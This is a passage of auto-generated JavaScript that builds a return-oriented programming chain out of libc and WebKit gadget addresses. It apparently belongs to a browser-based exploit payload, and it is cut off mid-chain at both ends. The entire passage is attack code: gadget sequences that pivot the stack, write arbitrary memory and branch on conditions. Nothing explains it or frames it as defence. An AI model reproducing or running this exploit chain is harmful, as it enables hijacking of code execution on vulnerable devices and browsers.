//L8959:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+424016, //L8961
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+424032, //L8962
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+424000, //L8960
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8960:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8961:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8962:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+424192, //L8966
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+424160, //L8964
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+424176, //L8965
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8963:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8964:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8965:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8966:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+424248, //L8968
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8968:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+424376, //L8970
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+424392, //L8971
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+424360, //L8969
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8969:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8970:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8971:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+424552, //L8975
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+424520, //L8973
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+424536, //L8974
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8972:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L8973:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8974:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8975:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+424608, //L8977
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L8977:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+424736, //L8979
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+424752, //L8980
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+424720, //L8978
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8978:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8979:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8980:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+424832, //L8981
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+424848, //L8982
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8981:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8982:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+424944, //L8984
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+424928, //L8983
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8983:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8984:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+425024, //L8985
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8985:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8986:
db([105, 0]); // 0x69
set_gadget(libc_base+144605,); //pop rdi
//L8987:
db([105, 0]); // 0x69
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+425168, //L8988
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+425200, //L8990
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+425184, //L8989
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L8988:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8989:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8990:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+425376, //L8992
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+425392, //L8993
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+425360, //L8991
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L8991:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8992:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8993:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+425552, //L8998
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+425568, //L8999
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+425504, //L8995
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L8995:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L8996:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L8997:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L8998:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L8999:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+425680, //L9000+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+425672, //L9000
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9000:
db([0, 0]); // 0x0
set_gadgets([
ropchain+425696, //L9000+24
ropchain+427912, //L8994
libc_base+764760, //pop rsi
ropchain+425736, //L9001
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9001:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9003:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+425856, //L9006
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+425840, //L9004
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9004:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9006:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+425936, //L9007
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+425952, //L9008
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9007:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9008:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+426112, //L9012
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+426080, //L9010
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+426096, //L9011
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9009:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9010:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9011:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9012:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+426168, //L9014
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9014:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+426296, //L9016
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+426312, //L9017
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+426280, //L9015
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9015:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9016:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9017:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+426472, //L9021
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+426440, //L9019
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+426456, //L9020
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9018:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9019:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9020:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9021:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+426528, //L9023
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9023:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+426656, //L9025
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+426672, //L9026
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+426640, //L9024
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9024:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9025:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9026:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+426832, //L9030
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+426800, //L9028
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+426816, //L9029
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9027:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L9028:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9029:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9030:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+426888, //L9032
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L9032:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+427016, //L9034
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+427032, //L9035
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+427000, //L9033
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9033:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9034:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9035:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+427112, //L9036
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+427128, //L9037
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9036:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9037:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+427224, //L9039
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+427208, //L9038
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9038:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9039:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+427304, //L9040
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9040:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9041:
db([100, 0]); // 0x64
set_gadget(libc_base+144605,); //pop rdi
//L9042:
db([100, 0]); // 0x64
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+427448, //L9043
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+427480, //L9045
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+427464, //L9044
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9043:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9044:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9045:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+427656, //L9047
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+427672, //L9048
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+427640, //L9046
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9046:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9047:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9048:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+427816, //L9051
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+427832, //L9052
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+427784, //L9049
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9049:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9050:
db([0, 0]); // 0x0
set_gadget(libc_base+763368,); //pop rcx
//L9051:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9052:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+427904, //L9053
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9053:
db([0, 0]); // 0x0
//L8994:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+428032, //L9056
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+428048, //L9057
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+428016, //L9055
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9055:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9056:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9057:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+428160, //L9059
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+428208, //L9062
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+428176, //L9060
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L9059:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9060:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9061:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9062:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+428320, //L9063+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+428312, //L9063
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L9063:
db([0, 0]); // 0x0
set_gadgets([
ropchain+428336, //L9063+24
ropchain+429688, //L9058
libc_base+764760, //pop rsi
ropchain+428376, //L9064
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9064:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9066:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+428496, //L9069
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+428480, //L9067
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9067:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9069:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+428672, //L9072
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+428688, //L9073
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+428640, //L9070
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+428656, //L9071
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9070:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L9071:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9072:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9073:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+428784, //L9075
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+428768, //L9074
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L9074:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9075:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9076:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9077:
db([2, 0]); // 0x2
set_gadget(libc_base+763368,); //pop rcx
//L9078:
db([2, 0]); // 0x2
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9079:
db([1, 0]); // 0x1
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L9080:
db([3, 0]); // 0x3
set_gadget(libc_base+763368,); //pop rcx
//L9081:
db([3, 0]); // 0x3
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+429136, //L9083
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9083:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+429192, //L9084
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9084:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+429280, //L9087
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L9086:
db([4294967295, 4294967295]); // 0xffffffffffffffff
set_gadget(libc_base+759608,); //pop rax
//L9087:
db([0, 0]); // 0x0
set_gadgets([
libc_base+847417, //xor rax, rsi ; sub rax, rsi
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+429344, //L9089
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9089:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+429400, //L9090
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9090:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760, //pop rsi
ropchain+429536, //L9094
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+429520, //L9093
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9092:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L9093:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L9094:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+429600, //L9095
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9095:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9097:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+429680, //L9098
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9098:
db([0, 0]); // 0x0
//L9058:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+429728, //L9100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L9100:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L9102:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+429848, //L9105
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+429832, //L9103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L9103:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L9105:
db([0, 0]); // 0x0
set_gadgets([
